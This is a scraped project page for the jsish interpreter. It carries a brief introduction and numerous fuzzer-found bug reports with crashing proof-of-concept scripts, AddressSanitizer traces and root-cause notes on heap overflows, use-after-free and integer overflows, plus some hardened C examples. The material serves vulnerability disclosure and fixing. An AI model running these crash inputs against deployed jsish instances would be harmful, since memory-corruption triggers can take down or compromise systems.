
jsish's Introduction

Jsi is a javascript-ish interpreter with builtin websocket-server, sqlite and C-extensibility.

Home | Docs

Start

Get the source and build with make.

Or download a binary: https://github.com/pcmacdon/jsibin/

🚩 See Start.

Usage

./jsish -W -docs /          # Jsi web-docs.
./jsish -S mysqlite.db      # Sqlite web-gui.

Compile and run a simple C-extension.

./jsish -c -jsc "function add(n1:number, n2:number=1):number { n1+=n2; \nRETURN(n1);\n }" Sum 
./jsish -e 'require("Sum",0); return Sum.add(9,3);'


jsish's Issues

Assertion `vp != resPtr' failed at jsiEval.c:1020: jsiEvalSubscript.

Jsish revision

Commit: 9fa798e

Version: v3.5.0

Build platform

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)

Build steps

export CFLAGS='-fsanitize=address'
make

Test case

(function(){
    var JSEtest = 1;
    for (var __loopvar3 = 0; JSEtest.length < (1) && __loopvar3 < 3; JSEtest.length++ + __loopvar3++) {
      JSEtest = 1;
    }
})();

Execution steps & Output

$ ./jsish/jsish poc.js
jsish: src/jsiEval.c:1020: jsiEvalSubscript: Assertion `vp != resPtr' failed.
[2]    11225 abort      jsish poc.js

Credits: Found by hopefly from OWL337.

stack-overflow in glibc regcomp

Build environment:

Ubuntu 16.04
gcc 5.4.0
version: a6fc196
build command:
export JSI__SANITIZE=1
make
test command: ./jsish poc

Target device:

Desktop Linux

POC

jsish-000418.txt

Description

Below is the ASAN output.

ASAN:SIGSEGV

==41969==ERROR: AddressSanitizer: stack-overflow on address 0x7fff2f2c8ff8 (pc 0x7f46bdb37cc0 bp 0x7fff2fabd910 sp 0x7fff2f2c8ff0 T0)

SUMMARY: AddressSanitizer: stack-overflow ??:0 ??
==41969==ABORTING

integer overflow and buffer overflow

Environment

operating system: ubuntu18.04
compile command: ./configure && make
test command: ./jsish poc1 

poc:

var o = [
    1,
    2
];
var JAZh = -2147483647 == -9007199254740991;
o = o.splice(o.length, o.length, o, o, o.length, 1.7976931348623157e+308);
o.length = o.length != o;
var itMb = 10000 <= -2147483648;
o = o.constructor();
var QHiF = o.length < o.length;
var a = Object.keys(o);
o.length = ~-9007199254740992;
var APSB = -9007199254740990 != a.length;
o = o.splice(o.length, a.length, 9007199254740994, o, APSB, 759250124);

vulnerability description:

The code that caused the vulnerability is at src/jsiObj.c:417, in the function jsi_ObjArraySizer; the code is as follows:
image
The parameter len is the length of the Array. The PoC initially sets it to a maximum value via o.length:
image
Then jsi_ArraySpliceCmd calls Jsi_ObjArraySizer. After the calculation in the code, nsiz comes out as a negative number, which bypasses the two checks at line 421 and line 425. The affected code is as follows:
image
obj->arr will obtain a smaller heap space through Jsi_Realloc, and then memset assigns a value to the space pointed to by obj->arr + obj->arrMaxSize, but this has by then exceeded the actual heap range of obj->arr, causing a heap overflow.

Assertion `v->d.lval != v' failed at src/jsiValue.c:181: ValueFree.

Jsish revision

Commit: 9fa798e

Version: v3.5.0

Build platform

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)

Build steps

export CFLAGS='-fsanitize=address'
make

Test case

function applyTags(text, open, close, action) {
    var openTags = arguments;
    var lastOcr = text.indexOf(open), nextOpen, nextClose, iniBlock, updBlock;
    if (openTags.pop()) {
        openTags.push(lastOcr);
    }
    while (openTags.length > 0) {
        lastOcr = action;
        nextOpen = text.indexOf(open, lastOcr + open.length);
        nextClose = text.indexOf(close, lastOcr + open.length);
    }
    return text;
}
function JSEtest(text) {
    return text.toUpperCase();
}

var text = '<lowcase> YEAH! </lowcase> Some <upcase> random <upcase> text </upcase> to </up$
text = applyTags(text, '<upcase>', '</upcase>', JSEtest);

Execution steps & Output

$ ./jsish/jsish poc.js

/home/user/poc.js:9: bug: Convert a unknown type: 0x6 to number    (at or near "length")
/home/user/poc.js:10: bug: Convert a unknown type: 0x6 to number    (at or near "length")

jsish: src/jsiValue.c:181: ValueFree: Assertion `v->d.lval != v' failed.
[2]    116137 abort      jsish poc.js

Credits: Found by OWL337 team.

Online demos yield "Bad gateway" error

split from #41: the online demos (https://docs.jsish.org/Demos.md#online) yield 502 Bad Gateway error for me, while they work fine for someone else.

The first demo link for me resolves to https://jsish.org/App10/Ledger, is that the same target for you @pcmacdon ?

I get 502 err with both FF and Chrome. I wonder if it has something to do with permissions or login status?

Here's the Network Headers according to Chrome dev tools:

Request URL: https://jsish.org/App10/Ledger
Request Method: GET
Status Code: 502 Bad Gateway
Remote Address: 50.116.0.90:443
Referrer Policy: no-referrer
Connection: keep-alive
Content-Length: 575
Content-Type: text/html
Date: Mon, 13 Sep 2021 19:18:06 GMT
Server: nginx/1.14.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cache-Control: max-age=0
Connection: keep-alive
DNT: 1
Host: jsish.org
sec-ch-ua: "Google Chrome";v="93", " Not;A Brand";v="99", "Chromium";v="93"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-site
Sec-Fetch-User: ?1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Saf

Feature request: Postgresql module

hi,

I use postgres for my database needs.
I would like to be able to use virtualpg+sqlite3 and native postgresql as database backends and for query writing.

heap-buffer-overflow at Jsi_DSAppendLen src/jsiDString.c:109

Build environment:

Ubuntu 16.04
gcc 5.4.0
version: 73f457f
build command:
export JSI__SANITIZE=1
make
test command: ./jsish poc

POC

jsish-1024-000133.txt

Description

Below is the ASAN output.

==42992==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60b00000a4f2 at pc 0x7fe14fca0935 bp 0x7ffe63bb9fa0 sp 0x7ffe63bb9748
READ of size 96 at 0x60b00000a4f2 thread T0
#0 0x7fe14fca0934 in __asan_memcpy (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x8c934)
#1 0x5c12d1 in memcpy /usr/include/x86_64-linux-gnu/bits/string3.h:53
#2 0x5c12d1 in Jsi_DSAppendLen src/jsiDString.c:109
#3 0x5ebb2e in Jsi_UtfSubstr src/jsiUtf8.c:130
#4 0x4e74f9 in _StringTrimCmd src/jsiString.c:370
#5 0x4e74f9 in StringTrimCmd src/jsiString.c:378
#6 0x4c405d in jsi_FuncCallSub src/jsiProto.c:244
#7 0x73eaa4 in jsiFunctionSubCall src/jsiEval.c:790
#8 0x73eaa4 in jsiEvalFunction src/jsiEval.c:825
#9 0x73eaa4 in jsiEvalCodeSub src/jsiEval.c:1250
#10 0x7506ec in jsi_evalcode src/jsiEval.c:2190
#11 0x4c517a in jsi_FuncCallSub src/jsiProto.c:220
#12 0x73e7ca in jsiFunctionSubCall src/jsiEval.c:790
#13 0x73e7ca in jsiEvalFunction src/jsiEval.c:825
#14 0x73e7ca in jsiEvalCodeSub src/jsiEval.c:1250
#15 0x7506ec in jsi_evalcode src/jsiEval.c:2190
#16 0x75317f in jsi_evalStrFile src/jsiEval.c:2496
#17 0x499c46 in Jsi_Main src/jsiInterp.c:917
#18 0xc0345a in jsi_main src/main.c:44
#19 0x7fe14f14083f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f)
#20 0x434f48 in _start (/home/keven/Fuzzing/jsish-1024/jsish+0x434f48)

0x60b00000a4f2 is located 0 bytes to the right of 98-byte region [0x60b00000a490,0x60b00000a4f2)
allocated by thread T0 here:
#0 0x7fe14fcac602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602)
#1 0x49e422 in Jsi_Malloc src/jsiUtils.c:52

SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 __asan_memcpy
==42992==ABORTING

stack overflow

Environment

operating system: ubuntu18.04
compile command: ./configure && make
test command: ./jsish poc1 

poc:

try {
    var __num = 11.001002;
    var PyeA = __num.toString(__num);
    var ZTZe = __num.toExponential(__num);
    var AkBW = __num.toPrecision(~_num);
    var tpWc = __num.toExponential(__num);
    var MPKY = __num.toExponential(__num);
} catch (ex) {
    sputnikException = ex;
}
var successfullyParsed = true;

vulnerability description:

image
~_num is passed as the parameter, that is, the precision. _num is an undefined variable, which jsish treats as 0 by default, so the negation becomes 0x7fffffff. In the function NumberToPrecisionCmd (src/jsiNumber.c), Jsi_GetIntFromValue is used to obtain the precision, which is the prec variable. But buf is a buffer on the stack of only 100 bytes. When prec exceeds 100, it causes a buffer overflow.
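As an added example (not Jsi's NumberToPrecisionCmd), a hypothetical hardened version of the pattern described above: the precision argument is converted and range-checked against the 1..100 window ECMAScript allows for toPrecision before anything is formatted, and the write into the 100-byte stack buffer is bounded by snprintf. The 100-byte buffer size follows the report; the function names, the conversion helper and the demo wrapper are assumptions.

```c
#include <math.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Number.prototype.toPrecision accepts 1..100 (ECMAScript); anything else
   is a RangeError in JS and must never reach the formatting buffer. */
#define PREC_MIN 1
#define PREC_MAX 100

/* Convert the JS argument to an integer the way an interpreter would
   (truncate toward zero; NaN becomes 0). Non-finite or absurdly large
   values are refused here instead of being truncated to some huge int. */
static bool js_to_precision_arg(double v, long *prec) {
    if (isnan(v)) { *prec = 0; return true; }
    if (!isfinite(v)) return false;
    if (v >= 1e9 || v <= -1e9) return false;   /* far outside 1..100 anyway */
    *prec = (long)v;                            /* truncates toward zero */
    return true;
}

/* Hypothetical hardened counterpart to the report's NumberToPrecisionCmd:
   range-check prec before formatting, and bound the write by buflen so a
   bad precision can never run past the (stack) buffer. Output follows
   printf's %g rules, not JS's exact digit rules; the point is the bound. */
static bool number_to_precision(double d, long prec, char *buf, size_t buflen) {
    if (buflen == 0) return false;
    buf[0] = '\0';
    if (prec < PREC_MIN || prec > PREC_MAX) return false;   /* JS: RangeError */
    int n = snprintf(buf, buflen, "%.*g", (int)prec, d);
    if (n < 0 || (size_t)n >= buflen) { buf[0] = '\0'; return false; } /* would truncate */
    return true;
}

/* Scenario helper mirroring the PoC: __num.toPrecision(arg) formatted into
   a 100-byte stack buffer as the report describes. Returns the formatted
   length, or -1 if the call was refused. */
static int precision_demo(double num, double arg) {
    char buf[100];
    long prec;
    if (!js_to_precision_arg(arg, &prec)) return -1;
    if (!number_to_precision(num, prec, buf, sizeof buf)) return -1;
    return (int)strlen(buf);
}
```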

integer overflow and buffer overflow

Environment

operating system: ubuntu18.04
compile command: ./configure && make
test command: ./jsish poc1 

poc:

var o = [
    1,
    2
];
o.length = -9007199254740991;
o, 90040991;
var ExBs = new RegExp('>l1Pq4Q~R$!');
ExBs = o.reverse();
var zaCp = o.unshift(o.length, o, ExBs.lastIndex, o);
o.length = o.length != o;
o = zaCp.toExponential(o.length);
var FfYD = new RegExp('@OsH');
JSON.stringify('/Z-s#YisGL');
o = o.constructor();
FfYD.lastIndex = -1 <= -2147483647;
o.length = 1e+81 == FfYD.lastIndex;
var yfSi = new Map([
    [
        1,
        1200,
        o.length,
        ExBs.lastIndex
    ],
    [
        o,
        ExBs,
        o,
        0,
        -Infinity,
        -Infinity
    ]
]);
var Hjwz = new Map([
    [],
    [
        o,
        o,
        -1
    ]
]);
var QkwQ = new RegExp('GBY');
var dPft = new Map([
    [
        -2147483648,
        FfYD.lastIndex,
        FfYD,
        3037000498,
        0.1,
        ExBs.length,
        FfYD,
        2147483649
    ],
    [
        ExBs,
        FfYD.lastIndex,
        -9007199254740994
    ]
]);
var fjNQ = o.indexOf(0.2, function () {
});
var a = Object.keys(o);
var TdaH = new RegExp('#0CHy=U2|.xg^{;xO');
var APSB = -9007199254740990 != a.length;
var BYaK = new Float32Array([
    yfSi,
    4,
    -4294967295,
    FfYD,
    zaCp
]);
var wCMe = new WeakSet([]);

vulnerability description:

image

In src/jsiObj.c:428, len is the length of the Array, and the PoC initially sets it to a maximum value via o.length. After the calculation in the code, nsiz comes out as a negative number, which bypasses the two checks at line 421 and line 425.
image

obj->arr will get a smaller heap space, and then memset assigns a value to the space pointed to by obj->arr + obj->arrMaxSize, but this has by then exceeded the actual heap range of obj->arr, causing a heap overflow.

heap-use-after-free at DeleteTreeValue src/jsiObj.c:170

Build environment:

Ubuntu 16.04
gcc 5.4.0
version: a6fc196
build command:
export JSI__SANITIZE=1
make
test command: ./jsish poc

Target device:
Desktop Linux

POC

jsish-1021-000042.txt

Description

Below is the ASAN output.

=================================================================
==139448==ERROR: AddressSanitizer: heap-use-after-free on address 0x60300000ee30 at pc 0x000000577524 bp 0x7ffcb1fc18d0 sp 0x7ffcb1fc18c0
READ of size 4 at 0x60300000ee30 thread T0
#0 0x577523 in DeleteTreeValue src/jsiObj.c:170
#1 0x595fda in Jsi_TreeEntryDelete src/jsiTree.c:636
#2 0x59ee29 in destroy_node src/jsiTree.c:496
#3 0x59ee29 in destroy_node src/jsiTree.c:494
#4 0x59ee29 in Jsi_TreeDelete src/jsiTree.c:515
#5 0x579387 in Jsi_ObjFree src/jsiObj.c:342
#6 0x57a5b7 in Jsi_ObjDecrRefCount src/jsiObj.c:434
#7 0x454cf1 in ValueFree src/jsiValue.c:178
#8 0x454cf1 in Jsi_ValueFree src/jsiValue.c:199
#9 0x454fef in Jsi_DecrRefCount src/jsiValue.c:52
#10 0x4535ed in jsi_FuncObjFree src/jsiFunc.c:1077
#11 0x5798dc in Jsi_ObjFree src/jsiObj.c:322
#12 0x57a5b7 in Jsi_ObjDecrRefCount src/jsiObj.c:434
#13 0x454cf1 in ValueFree src/jsiValue.c:178
#14 0x454cf1 in Jsi_ValueFree src/jsiValue.c:199
#15 0x454fef in Jsi_DecrRefCount src/jsiValue.c:52
#16 0x524735 in Jsi_OptionsFree src/jsiOptions.c:1383
#17 0x48a1f3 in jsiInterpDelete src/jsiInterp.c:1904
#18 0xc07b3f in jsi_main src/main.c:46
#19 0x7f2eba2e983f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2083f)
#20 0x434fc8 in _start (/home/keven/Fuzzing/jsish-1021/jsish+0x434fc8)

0x60300000ee30 is located 0 bytes inside of 32-byte region [0x60300000ee30,0x60300000ee50)
freed by thread T0 here:
#0 0x7f2ebae552ca in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x982ca)
#1 0x454fef in Jsi_DecrRefCount src/jsiValue.c:52

previously allocated by thread T0 here:
#0 0x7f2ebae5579a in __interceptor_calloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x9879a)
#1 0x49f5a4 in Jsi_Calloc src/jsiUtils.c:57

SUMMARY: AddressSanitizer: heap-use-after-free src/jsiObj.c:170 DeleteTreeValue
==139448==ABORTING

missing mysql/my_config.h

I have installed libmysqlclient-dev package on my Ubuntu 20.04. Yet, make reports an error:

src/jsiMySql.c:30:10: fatal error: mysql/my_config.h: No such file or directory
   30 | #include <mysql/my_config.h>

There is no my_config.h in /usr/include/mysql/ folder. My version of libmysqlclient-dev is 8.0.19-0ubuntu5

Memory leak in recursive object inserts.

Description

When the Jsi_Realloc function of jsiUtils.c uses realloc to expand the memory of a dynamic array, if the requested size is larger than the original size, the new memory from realloc will not be initialized (cleared), causing memory leaks.

Debug Information

poc1_crash

Memory leaks in linenoise src/linenoise.c:1061

Jsish revision

Commit: 9fa798e

Version: v3.5.0

Build platform

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)

Build steps

export CFLAGS='-fsanitize=address'
make

Test case

var JSEtest = [
    'aa',
    'bb',
    'hhh'
];
try { Number.bind(console.input('listNum' + JSEtest), 4)(); } catch (e) {};
try { (1 >> y).toFixed.bind(2, 4)(); } catch (e) {};
(1 >> y).toFixed.bind(2, 4)();

Execution steps & Output

$ ./jsish/jsish poc.js

listNum [object Object]
/home/user/poc.js:10: error: apply Number.toFixed to a non-number object
ERROR:
=================================================================
ERROR: LeakSanitizer: detected memory leaks
Direct leak of 1 byte(s) in 1 object(s) allocated from:
    #0 0x7f0e5412d538 in strdup (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x77538)
    #1 0x56523c6594ad in linenoise src/linenoise.c:1061
SUMMARY: AddressSanitizer: 1 byte(s) leaked in 1 allocation(s).

Credits: Found by OWL337 team.

buffer overflow

Environment

operating system: ubuntu18.04
compile command: ./configure && make
test command: ./jsish poc1 

poc:

var o = [
    1,
    2
];
o.length = ~-2147483648;
o = o.reverse();
var a = Object.keys(o);
var pJZc = JSON.stringify('gA6MJqj19J?*JEEN');
pJZc = pJZc.slice(pJZc.length, pJZc.length);
pJZc = o.filter(function () {
}, 3037000498);
var GRPm = new RegExp('');
var NXPj = new RegExp('_IÁ\x80\xA7\t\x07ñ\xBB=MÙ%ÿ');
GRPm = o.indexOf(2147483647, function () {
});
JSON.stringify('Rmt(3oS<C?]+^J*uH0pR]');
o = a.slice(o, o);
var DYsj = new SharedArrayBuffer(2147483647);
var KweA = new Map([
    [
        0,
        1,
        o,
        673720360,
        o,
        a,
        o.length
    ],
    [
        a.length,
        42,
        a,
        -2147483648,
        a.length,
        -Infinity,
        o,
        1e-15
    ]
]);
var JXpp = JSON.stringify('\xA6\xB8løÚz\x1Cz\x81\x83ó\x9D;\xA9!ð\x8F\x87\xB3nZ');
var NRrA;
NRrA = o.toString(o);

vulnerability description:

The code that caused the vulnerability is in src/jsiArray.c:464, in the function jsi_ArrayFilterCmd; the code is as follows:
[screenshot not captured]
curlen is obtained by reading the length of the object obj, as shown in the figure:
[screenshot not captured]
Modify the length of obj in the PoC to a larger value, i.e.:
[screenshot not captured]
Then call the o.filter function to trigger jsish's jsi_ArrayFilterCmd function, which makes the curlen value larger and accesses heap space beyond the end of the obj->arr array.
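
The pattern this report describes, a script-writable `length` that the C loop trusts as its bound even though the backing allocation is smaller, as an added example. This is not jsish's code: `JsArray`, its field names, `slot_read` and the `demo_*` functions are assumptions chosen to model the report, and the read past the allocation is recorded rather than performed so the example runs cleanly.

```c
#include <stddef.h>
#include <stdlib.h>

/* Minimal model of a script array. The names are assumptions for this
 * example, not jsish's: `arr` has `arr_max` allocated slots, while
 * `length` is the script-visible length, which script can set far past
 * `arr_max` (the PoC sets o.length = 2147483647 on a two-element array). */
typedef struct {
    int *arr;
    size_t arr_max;
    size_t length;
} JsArray;

static JsArray *js_array_new(const int *init, size_t n) {
    JsArray *a = calloc(1, sizeof *a);
    if (!a) return NULL;
    a->arr = calloc(n ? n : 1, sizeof *a->arr);
    if (!a->arr) { free(a); return NULL; }
    for (size_t i = 0; i < n; i++) a->arr[i] = init[i];
    a->arr_max = n;
    a->length = n;
    return a;
}

static void js_array_free(JsArray *a) {
    if (a) { free(a->arr); free(a); }
}

/* Instrumented slot read: instead of dereferencing past the allocation
 * (what ASAN flags in jsi_ArrayFilterCmd), record the out-of-bounds
 * access in *oob and return a hole (0). */
static int slot_read(const JsArray *a, size_t i, size_t *oob) {
    if (i >= a->arr_max) { (*oob)++; return 0; }
    return a->arr[i];
}

static int keep_positive(int v) { return v > 0; }

/* Vulnerable shape: the loop bound is the script-controlled `length`,
 * so every index past `arr_max` is a heap over-read. */
static size_t filter_unchecked(const JsArray *a, int (*pred)(int), size_t *oob) {
    size_t kept = 0;
    for (size_t i = 0; i < a->length; i++)
        if (pred(slot_read(a, i, oob))) kept++;
    return kept;
}

/* Hardened shape: never walk past the allocation. Indexes between
 * arr_max and length are holes, which filter skips anyway. */
static size_t filter_clamped(const JsArray *a, int (*pred)(int), size_t *oob) {
    size_t limit = a->length < a->arr_max ? a->length : a->arr_max;
    size_t kept = 0;
    for (size_t i = 0; i < limit; i++)
        if (pred(slot_read(a, i, oob))) kept++;
    return kept;
}

/* Build [1, 2], inflate length to 1000 as the PoC does, run one of the
 * two filters, and report the kept count and the attempted OOB reads. */
static size_t run_demo(int clamped, size_t *oob) {
    static const int init[] = {1, 2};           /* constructed input */
    JsArray *a = js_array_new(init, 2);
    size_t kept;
    if (!a) return (size_t)-1;
    a->length = 1000;                           /* script: o.length = 1000 */
    *oob = 0;
    kept = clamped ? filter_clamped(a, keep_positive, oob)
                   : filter_unchecked(a, keep_positive, oob);
    js_array_free(a);
    return kept;
}

static size_t demo_unchecked_oob(void) { size_t o; run_demo(0, &o); return o; }  /* 998 */
static size_t demo_clamped_oob(void)   { size_t o; run_demo(1, &o); return o; }  /* 0 */
static size_t demo_clamped_kept(void)  { size_t o; return run_demo(1, &o); }     /* 2 */
```

The fix is in the loop bound, not in `filter` itself: any builtin that iterates an array has to take its bound from the allocation (or treat `length` beyond it as holes), because `length` is attacker-controlled data the moment script can assign it.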

Various string crashes

It looks like jsish is failing to check/enforce some of the basic string limits, and crashes instead of erroring out.

var s = 'abcdefghijklmnopqrstuvwxyz';
try { s.repeat(9999999);
} catch(e) { puts('repeat fail', e); }
while (true)
   s += s;

integer overflow and buffer overflow

Environment

operating system: ubuntu18.04
compile command: ./configure && make
test command: ./jsish poc1 

poc:

var o = [
    1,
    2
];
o, 90040991;
var ExBs = new RegExp('>l1Pq4Q~R$!');
ExBs = o.reverse();
ExBs.length = ~3037000498;
var zaCp = o.unshift(o.length, o, ExBs.lastIndex, o);
var FfYD = new RegExp('@OsH');
o = o.constructor();
var yfSi = new Map([
    [
        1,
        1200,
        o.length,
        ExBs.lastIndex
    ],
    [
        o,
        ExBs,
        o,
        0,
        -Infinity,
        -Infinity
    ]
]);
var YAjm = yfSi.keys();
var QkwQ = new RegExp('GBY');
var dPft = new Map([
    [
        -2147483648,
        FfYD.lastIndex,
        FfYD,
        3037000498,
        0.1,
        ExBs.length,
        FfYD,
        2147483649
    ],
    [
        ExBs,
        FfYD.lastIndex,
        -9007199254740994
    ]
]);
var fjNQ = o.indexOf(0.2, function () {
});
var a = Object.keys(o);
var APSB = -9007199254740990 != a.length;
var wCMe = new WeakSet([]);

vulnerability description:

The code that generated the vulnerability is in src/jsiObj.c:428; the code is as follows:
[screenshot not captured]
len is the length of the Array, and in the PoC it is initially set to a maximum value via o.length. After the code's calculation, nsiz comes out as a negative number, which bypasses the two checks on line 421 and line 425.
The affected code is as follows:
[screenshot not captured]
obj->arr will get a smaller heap allocation, and then memset writes to the space pointed to by obj->arr + obj->arrMaxSize, which by then has exceeded the actual heap range of obj->arr, causing a heap overflow.
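
The arithmetic failure this report describes, a growth computation that wraps negative and then passes checks written for positive sizes, beside an overflow-checked version, as an added example. This is not jsish's code: the growth policy (`len * 2 + 16`), the `ARRAY_MAX_SLOTS` cap, `sizer_checked`, `grow_slots` and the `demo_*` functions are assumptions for the example, since the page shows neither jsish's formula nor its limit.

```c
#include <stdint.h>
#include <stdlib.h>
#include <string.h>

/* Cap on array slots that the sizer enforces. The value is an assumption
 * for this example; whatever limit jsish applies is not shown on the page. */
#define ARRAY_MAX_SLOTS (1 << 26)

/* Growth policy shared by both versions (also an assumption):
 * new size = len * 2 + 16. */
static int32_t grow_policy_wrapping(int32_t len) {
    /* Model what 32-bit signed arithmetic produces once it wraps.
     * Done in uint32_t so this example has no undefined behaviour. */
    uint32_t u = (uint32_t)len * 2u + 16u;
    return (int32_t)u;
}

/* Vulnerable shape: the checks run on the already-wrapped value. A huge
 * `len` wraps to a negative nsiz, which is never greater than the cap,
 * so it sails through and is handed to realloc / memset. */
static int32_t sizer_unchecked(int32_t len) {
    int32_t nsiz = grow_policy_wrapping(len);
    if (nsiz > ARRAY_MAX_SLOTS)
        nsiz = ARRAY_MAX_SLOTS;
    return nsiz;
}

/* Hardened shape: reject a negative length up front (the `arr.length = ~arr`
 * PoC in the DOS report further down the page sets length to -1), detect
 * the overflow before it happens, and clamp to the cap.
 * Returns 0 on success, -1 on rejection. */
static int sizer_checked(int32_t len, int32_t *out) {
    int32_t nsiz;
    if (len < 0) return -1;
    if (__builtin_mul_overflow(len, 2, &nsiz) ||
        __builtin_add_overflow(nsiz, 16, &nsiz))
        return -1;
    if (nsiz > ARRAY_MAX_SLOTS) nsiz = ARRAY_MAX_SLOTS;
    *out = nsiz;
    return 0;
}

/* Grow a slot buffer from old_max to new_max and zero the new tail, the
 * step the report says overran the heap. Only a size that passed
 * sizer_checked is accepted, and the byte count is overflow-checked too. */
static void **grow_slots(void **arr, int32_t old_max, int32_t new_max) {
    size_t bytes;
    void **n;
    if (old_max < 0 || new_max < old_max) return NULL;
    if (__builtin_mul_overflow((size_t)new_max, sizeof *arr, &bytes)) return NULL;
    n = realloc(arr, bytes);
    if (!n) return NULL;
    memset(n + old_max, 0, (size_t)(new_max - old_max) * sizeof *arr);
    return n;
}

/* The length the PoC produces: ~3037000498 under JS ToInt32 semantics. */
static int32_t poc_length(void) {
    int32_t as_int32 = (int32_t)(uint32_t)3037000498u;  /* -1257966798 */
    return ~as_int32;                                   /* 1257966797 */
}

static int demo_unchecked_goes_negative(void) { return sizer_unchecked(poc_length()) < 0; }
static int demo_checked_rejects_poc(void)     { int32_t o; return sizer_checked(poc_length(), &o) != 0; }
static int32_t demo_checked_normal(void)      { int32_t o; return sizer_checked(2, &o) == 0 ? o : -1; } /* 20 */

/* Grow 2 -> 20 slots and confirm the new tail is zeroed. Returns 1 on success. */
static int demo_grow(void) {
    int32_t nsiz;
    void **arr = malloc(2 * sizeof *arr);
    int ok = 0;
    if (!arr) return 0;
    arr[0] = arr; arr[1] = arr;                   /* existing slots hold something */
    if (sizer_checked(2, &nsiz) == 0) {
        void **g = grow_slots(arr, 2, nsiz);
        if (g) {
            arr = g;
            ok = (arr[0] != NULL && arr[1] != NULL && arr[2] == NULL && arr[nsiz - 1] == NULL);
        }
    }
    free(arr);
    return ok;
}
```

The ordering matters: validate the input, then compute the size with overflow detection, then clamp; a clamp applied after the wrap is checking a number that no longer means anything.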

Use After Free in JsiInterp:643

Description

When jsi_DecrRefCount calls the jsi_freeValueEntry function, it incorrectly references the heap block that has been freed by jsi_freeValueEntry (src/jsiInterp.c:643), causing the Use After Free vulnerability

Build Environment

Ubuntu 16.04 x86_64
gcc version 6.5.0 20181026

Debug Information

[screenshot not captured]
backtrace

//...
Program received signal SIGABRT
// ...
#4  0x00000000004249e1 in jsi_freeValueEntry (interp=0x83d010, hPtr=0x8ce930, ptr=0x8cd110) at src/jsiInterp.c:643
#5  0x000000000044c446 in Jsi_HashClear (tablePtr=0x849350) at src/jsiHash.c:507
#6  0x000000000044c53b in Jsi_HashDelete (tablePtr=0x849350) at src/jsiHash.c:526
#7  0x0000000000429975 in jsiInterpDelete (interp=0x83d010, unused=0x83d010) at src/jsiInterp.c:1849
#8  0x000000000042a3fd in Jsi_EventuallyFree (interp=0x83d010, data=0x83d010, proc=0x4291ec <jsiInterpDelete>) at src/jsiInterp.c:1987
#9  0x000000000042a19a in Jsi_InterpDelete (interp=0x83d010) at src/jsiInterp.c:1941
#10 0x000000000059ad50 in jsi_main (argc=0x2, argv=0x7fffffffdfd8) at src/main.c:46
#11 0x000000000059ad9f in main (argc=0x2, argv=0x7fffffffdfd8) at src/main.c:52

DOS

Environment

operating system: ubuntu18.04
compile command: export JSI__SANITIZE=1 && make
test command: ./jsish poc

poc:

var arr = [
    {
        a: 1,
        b: 2
    },
    {
        a: 1,
        b: 2
    },
    {
        a: 1,
        b: 2
    }
];
arr.length = ~arr;
arr.unshift(-9007199254740991, 153, 10000, 1e+81);

vulnerability description:

ASAN outputs the following error. It appears to be operating on Jsi_ObjArraySizer, which causes a negative value to be passed into realloc. For correct operation, abnormal parameters should be detected.

=================================================================
==91080==ERROR: AddressSanitizer: negative-size-param: (size=-8)
    #0 0x7f47518aa05d in __asan_memmove (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x8d05d)
    #1 0x483c77 in jsi_ArrayUnshiftCmd src/jsiArray.c:816
    #2 0x59e6a6 in jsi_FunctionSubCall src/jsiEval.c:855
    #3 0x59f349 in jsiEvalFunction src/jsiEval.c:916
    #4 0x5a3e0c in jsi_evalcode_sub src/jsiEval.c:1306
    #5 0x5b28b8 in jsi_evalcode src/jsiEval.c:2154
    #6 0x5b5e1c in jsi_evalStrFile src/jsiEval.c:2468
    #7 0x5b6749 in Jsi_EvalFile src/jsiEval.c:2517
    #8 0x43bd4c in Jsi_Main src/jsiInterp.c:922
    #9 0x6996e9 in jsi_main src/main.c:44
    #10 0x6997d4 in main src/main.c:52
    #11 0x7f4750d4982f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
    #12 0x414cb8 in _start (/home/node/xjsish/jsish+0x414cb8)

0x60c000015940 is located 0 bytes inside of 128-byte region [0x60c000015940,0x60c0000159c0)
allocated by thread T0 here:
    #0 0x7f47518b5961 in realloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98961)
    #1 0x44ecd9 in Jsi_Realloc src/jsiUtils.c:47
    #2 0x4d16ea in Jsi_ObjArraySizer src/jsiObj.c:427
    #3 0x4d182f in Jsi_ObjNewArray src/jsiObj.c:441
    #4 0x5b00ca in jsi_evalcode_sub src/jsiEval.c:1914
    #5 0x5b28b8 in jsi_evalcode src/jsiEval.c:2154
    #6 0x5b5e1c in jsi_evalStrFile src/jsiEval.c:2468
    #7 0x5b6749 in Jsi_EvalFile src/jsiEval.c:2517
    #8 0x43bd4c in Jsi_Main src/jsiInterp.c:922
    #9 0x6996e9 in jsi_main src/main.c:44
    #10 0x6997d4 in main src/main.c:52
    #11 0x7f4750d4982f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)

SUMMARY: AddressSanitizer: negative-size-param ??:0 __asan_memmove
==91080==ABORTING

heap-buffer-overflow at jsi_utf_tocase src/jsiString.c:396

Build environment:

Ubuntu 16.04
gcc 5.4.0
version: 73f457f
build command:
export JSI__SANITIZE=1
make
test command: ./jsish poc

POC

jsish-1024-000124.txt

Description

